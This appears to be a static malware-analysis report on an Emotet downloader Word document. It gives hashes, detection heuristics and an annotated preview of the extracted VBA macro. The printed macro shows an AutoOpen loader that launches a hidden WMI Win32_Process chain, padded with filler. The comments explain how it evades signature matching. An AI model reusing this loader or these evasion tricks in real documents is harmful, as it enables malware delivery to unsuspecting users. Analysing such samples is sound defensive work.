Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 fc4a5dcf28bc2330…

MALICIOUS

Office (OLE)

139.9 KB Created: 2019-05-21 07:46:00 Authoring application: Microsoft Office Word First seen: 2019-12-10
MD5: 0cf1229d338902a6324f42023ef05536 SHA-1: 34dc164db29683febca32edb524da9b158f64a36 SHA-256: fc4a5dcf28bc233088a95d558803973665cf2bc127510d294bc10e52d07138c5
342 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1047 Windows Management Instrumentation (the macro obtains `winmgmts:Win32_Process` via GetObject to launch its payload; see the WMI launcher heuristic below)

The sample contains a critical heuristic firing for an obfuscated auto-exec VBA loader that uses WMI to launch processes. The presence of an AutoOpen macro and the ClamAV detection signature 'Doc.Downloader.Emotet-10001946-0' strongly indicate this is an Emotet downloader. In the extracted macro, the `autoopen` entry point calls `B99_74`, which obtains WMI objects through `GetObject` on `winmgmts:Win32_ProcessStartup` and `winmgmts:Win32_Process` (each moniker is split by string concatenation and routed through a helper `v752570`, which is why the class name does not appear as a single literal) and sets `ShowWindow = 422843 - 422843`, i.e. 0, so the launched process starts with a hidden window. The bulk of the source is dead-store array filler that pads the real logic. The `Win32_Process.Create` call and the command line it receives fall outside the truncated preview, so the secondary payload's download URL is not visible in this report; the remainder of the 5,808-byte macros.bas should be reviewed for it before treating this as a fully characterised downloader.

Heuristics 9

  • ClamAV: Doc.Downloader.Emotet-10001946-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that for this sample the description does not match the other findings: a VBA project was recovered (OLE_VBA_MACROS fired and macros.bas was extracted below), so this marker is redundant with OLE_VBA_AUTOOPEN here and should not be counted as independent evidence.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — this is the standard Office Open XML DrawingML namespace identifier found in ordinary Office documents; it is not a network indicator and should not be used as an IOC. No C2 or payload URL is present in the visible portion of the extracted macro.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5808 bytes
SHA-256: 0c89221e537bf357fcba350de690c01166c38552d4601e2b045def3c757e435f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "D2722316"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "o59071, 0, 0, MSForms, TextBox"
Attribute VB_Control = "z4641307, 1, 1, MSForms, TextBox"

Attribute VB_Name = "Y12454"
' Obfuscation filler. Declares two large dynamic arrays, writes four
' arithmetic results into each, and exits; nothing in the visible extract
' reads the arrays afterwards and no other Sub in the extract calls T58828.
' The Int(...) operands and the bare identifiers are declared nowhere in the
' extract. NOTE(review): presumably implicit (Empty/0) variants, so each
' expression reduces to the literal constants — confirm; no Option Explicit
' is visible in this module.
Sub T58828()
   ' Dead-store array #1: upper bound 53266, only four indices ever written.
   Dim F80871()
      ReDim F80871(53266)
      F80871(53148) = 955 + Int(U946439) + B2152371 + Int(656) + z1174585 + Y43_07_ + 128 + z59643
      F80871(53136) = 103 + Int(l95388) + k2_64347 + Int(769) + Q780561 + b31432 + 615 + E74504
      F80871(53220) = 961 + Int(f35_768) + E_198123 + Int(438) + R376682 + n5_10550 + 557 + i156014
      F80871(53121) = 958 + Int(i00845) + X0474_81 + Int(994) + i38961 + B7642072 + 531 + c19_29
   ' Dead-store array #2: same bound, same four indices, different constants.
   Dim J9992_8()
      ReDim J9992_8(53266)
      J9992_8(53148) = 559 + Int(E3_88_) + X88623 + Int(582) + U868863 + R_908959 + 136 + c792917
      J9992_8(53136) = 776 + Int(X12190) + T88__74 + Int(338) + w15189 + v4_80625 + 900 + o009392
      J9992_8(53220) = 893 + Int(K955707) + U44__47 + Int(700) + s68580 + O246_3 + 189 + b348766
      J9992_8(53121) = 528 + Int(v_67148) + b49769 + Int(302) + r51938 + c74_2_4 + 346 + o73336
End Sub
' Auto-execution entry point: Word runs this when the document is opened
' (AutoOpen is matched case-insensitively). The declaration is spread over
' three physical lines with "_" continuations, which plausibly defeats naive
' single-line "Sub AutoOpen" string matching. Aside from the array filler,
' the only effect of this Sub is the call to B99_74, which holds the
' GetObject("winmgmts:...") WMI process-launch chain.
Sub _
autoopen( _
)
   ' Filler: four dead stores into an array with upper bound 87025. The
   ' identifiers inside the sums are not declared anywhere in the extract;
   ' NOTE(review): presumably Empty/0, so only the literals contribute — confirm.
   Dim S55338()
      ReDim S55338(87025)
      S55338(86925) = 197 + Int(r0557287) + o05854 + Int(864) + S172_4 + c332_6_ + 179 + P2747328
      S55338(86900) = 61 + Int(f895089) + X259354_ + Int(832) + b057_81 + A4369_6 + 489 + p2_052
      S55338(86890) = 714 + Int(J_3983) + N3638408 + Int(140) + A3092974 + B5390359 + 502 + h23430
      S55338(86859) = 113 + Int(J34900) + F12_69 + Int(232) + T915_8 + T1760066 + 528 + G5___486
' The real work: B99_74 is defined later in this module and its body runs
' past the end of the visible extract (the Win32_Process.Create call and the
' command line are not shown here).
B99_74
   ' More filler after the call, same shape as above.
   Dim a_168059()
      ReDim a_168059(87025)
      a_168059(86925) = 305 + Int(I4702167) + X17421 + Int(605) + c9264651 + T9029141 + 182 + j246829
      a_168059(86900) = 158 + Int(F273_1) + Q91093 + Int(183) + q3015750 + A8580883 + 692 + p1600_49
      a_168059(86890) = 361 + Int(F3__22) + H44496_ + Int(79) + G_6301 + J78123 + 658 + F806673
      a_168059(86859) = 174 + Int(m84_028) + r05_90 + Int(974) + D3172_05 + h441375 + 633 + n_51509
End Sub
Sub B99_74()
   Dim V43261()
      ReDim V43261(87025)
      V43261(86925) = 286 + Int(U_3194_) + w9826_ + Int(576) + L128_9_ + d_37556 + 729 + z_049476
      V43261(86900) = 429 + Int(j9211949) + A4955_5 + Int(304) + m100658 + T3728_2 + 76 + i2__3_7
      V43261(86890) = 82 + Int(T232737) + i82_58 + Int(175) + F630__ + o270048 + 974 + B56544
      V43261(86859) = 746 + Int(Z373165_) + b34525 + Int(472) + l45_652 + j2021333 + 219 + V64395_
Set j9118_6 = GetObject(v752570("winmgmts:Win32" + "_Processstartup"))
   Dim L7913123()
      ReDim L7913123(87025)
      L7913123(86925) = 275 + Int(S_115665) + X74410 + Int(100) + D6_491 + E9__7606 + 125 + f15568
      L7913123(86900) = 1 + Int(R988823) + k419957 + Int(631) + H69_0112 + a79736 + 280 + Q63515
      L7913123(86890) = 676 + Int(Q_00623_) + o78_7402 + Int(536) + N254040 + b3129848 + 35 + L_55886
      L7913123(86859) = 675 + Int(O27310) + j94_947 + Int(602) + v132_1 + m17203 + 897 + D50900
j9118_6. _
ShowWindow = 422843 - 422843
   Dim a_213263()
      ReDim a_213263(87025)
      a_213263(86925) = 921 + Int(z407_800) + f06534 + Int(526) + L817474 + n041_480 + 646 + p188932
      a_213263(86900) = 497 + Int(w443_3) + c_732269 + Int(542) + o48210 + T0260269 + 562 + w1822506
      a_213263(86890) = 909 + Int(z83360) + R59370 + Int(451) + H74_09_2 + i92445 + 263 + L787657
      a_213263(86859) = 400 + Int(F48_2543) + z41598 + Int(430) + V04_13 + w074485 + 971 + r1__3205
Set K85731 = GetObject(v752570("winmgmts:Win32" + "_Process"))
   Dim V0972258()
      ReDim V0972258(87025)
      V0972258(86925) = 971 + Int(O25473_) + j33_07 + Int(826) + X55_29 + D920521 + 276 + W2725_04
      V0972258(86900) = 397 + Int(J356767) + B77_33 + Int(127) + F28395 + O162951 + 976 + m597644
      V0972258(86890) = 815 + Int(j_29614) + z614_3 + Int(544)
... (truncated)